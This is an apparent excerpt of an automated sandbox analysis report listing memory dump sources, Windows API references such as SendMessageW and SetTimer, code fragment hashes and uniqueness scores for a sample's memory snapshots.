                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00C2DBB6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0F0F7A35
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,?,?), ref: 0794C6F5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,?,?), ref: 0794C6F5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,?,?), ref: 0F0FE12D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetTimer.USER32(?,04DDAF30,?,?), ref: 16E2EB7D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Timer
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2870079774-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                                                                            • Opcode ID: 103eed03ee9daeaec90cfe43afc21770c3360c232e482890c93c078f38f96874
                                                                                                                                                                                                            • Instruction ID: 19238f3a2b76d4924caec0033a093e05f736f04397357d24484f4f1f6767cd68
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 103eed03ee9daeaec90cfe43afc21770c3360c232e482890c93c078f38f96874
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBD1D87590064ACFCF05DFA8C8949DDB7B1FF48314B218659D8066B359EB74AE8ACF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                                            • Opcode ID: 03ccf43361755e0d1472f6b48aae096443cd5ee95e8b256c01d9a2378ee1a455
                                                                                                                                                                                                            • Instruction ID: e37381b5ce9931c9f25f1dcc67c67889389f844c7adb4c9c675afd1b0b662985
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03ccf43361755e0d1472f6b48aae096443cd5ee95e8b256c01d9a2378ee1a455
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1EB7590064ACFCF05DFA8C4948DDB7B1FF98314B218655D846AB359EB34AE8ACF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: P
                                                                                                                                                                                                            • API String ID: 0-1343716551
                                                                                                                                                                                                            • Opcode ID: c4c049257d184c75c2f21a581d8b1074ca2d031766f82a60daa8a38c78a44c2e
                                                                                                                                                                                                            • Instruction ID: a98218bedcac64e16bbe1dfc3cc0a6cde049565bef9cc6f2848022dfa020b291
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4c049257d184c75c2f21a581d8b1074ca2d031766f82a60daa8a38c78a44c2e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE712C34E0060ACFDB05DF79DA546ADBBB2FF88301F1085ADE946A7350EB38A945CB50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: P
                                                                                                                                                                                                            • API String ID: 0-1343716551
                                                                                                                                                                                                            • Opcode ID: 1cc45ab15ee96dffd8a3308ed0aec5c6abda303f443ba3ecd0070e7ba5c8e35d
                                                                                                                                                                                                            • Instruction ID: 4f70f7db2fc94701c58592e86025af168be04692b57eb79b3ee796bcad8aa4a8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cc45ab15ee96dffd8a3308ed0aec5c6abda303f443ba3ecd0070e7ba5c8e35d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B512D74A01249DFCB15DFA8C990A9EBBF2FF88304F148169E515AB364DB35E856CF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq
                                                                                                                                                                                                            • API String ID: 0-3175707579
                                                                                                                                                                                                            • Opcode ID: 55781f620ef390732d2f35c617e27827eb12dc389f2656cd1a323fcb5254ae50
                                                                                                                                                                                                            • Instruction ID: 09179fb12702151b07d822c052a20b42bd6d44895e0b43600308d666224e4147
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55781f620ef390732d2f35c617e27827eb12dc389f2656cd1a323fcb5254ae50
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A141CEB5A042589FDB10CFA9C840AAFBFF9EF89310F14801AE855A7351C735AD05CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hoq
                                                                                                                                                                                                            • API String ID: 0-3049094369
                                                                                                                                                                                                            • Opcode ID: 3c4930c15b4df838ec15b8501e5c9b7c13294f996b23337465f8cf94a3eb7048
                                                                                                                                                                                                            • Instruction ID: a091674724b3c1e48f718feb3c76bbb99e0e91fdf8eecf576fae29293bf1ebaf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c4930c15b4df838ec15b8501e5c9b7c13294f996b23337465f8cf94a3eb7048
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9731D235A00209EBDB04EFA4C95AA9EBBB6FF89300B054569E506AB354DF34AD05DB90
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq
                                                                                                                                                                                                            • API String ID: 0-3175707579
                                                                                                                                                                                                            • Opcode ID: 8eb3c7062414b34b1d92447045a1d8cdc7fd7670012c205a1798a03e28c08470
                                                                                                                                                                                                            • Instruction ID: 97b2cd4cdbef27803570f245fdbee00a388fcea3314fd3a60fbe299e5eb93afb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8eb3c7062414b34b1d92447045a1d8cdc7fd7670012c205a1798a03e28c08470
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7931D675A002589FDB10DFAAD844B9FBFF9EB88310F108419D409E7340DB34AC40CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq
                                                                                                                                                                                                            • API String ID: 0-3175707579
                                                                                                                                                                                                            • Opcode ID: f30fbce959384daf8af1202c58b79c4cbbfb13483935f68478a53880a283db83
                                                                                                                                                                                                            • Instruction ID: 1bfe124e2fb7187a64561bbda16c94ae1a5112118f584f5a9eea44d22e7e3e4c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f30fbce959384daf8af1202c58b79c4cbbfb13483935f68478a53880a283db83
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3931D235A146488FCB05DFB8C4145ADBFF2EF8D200F14C5AAD419AB361DF359945CB90
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4'kq
                                                                                                                                                                                                            • API String ID: 0-3255046985
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4'kq
                                                                                                                                                                                                            • API String ID: 0-3255046985
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

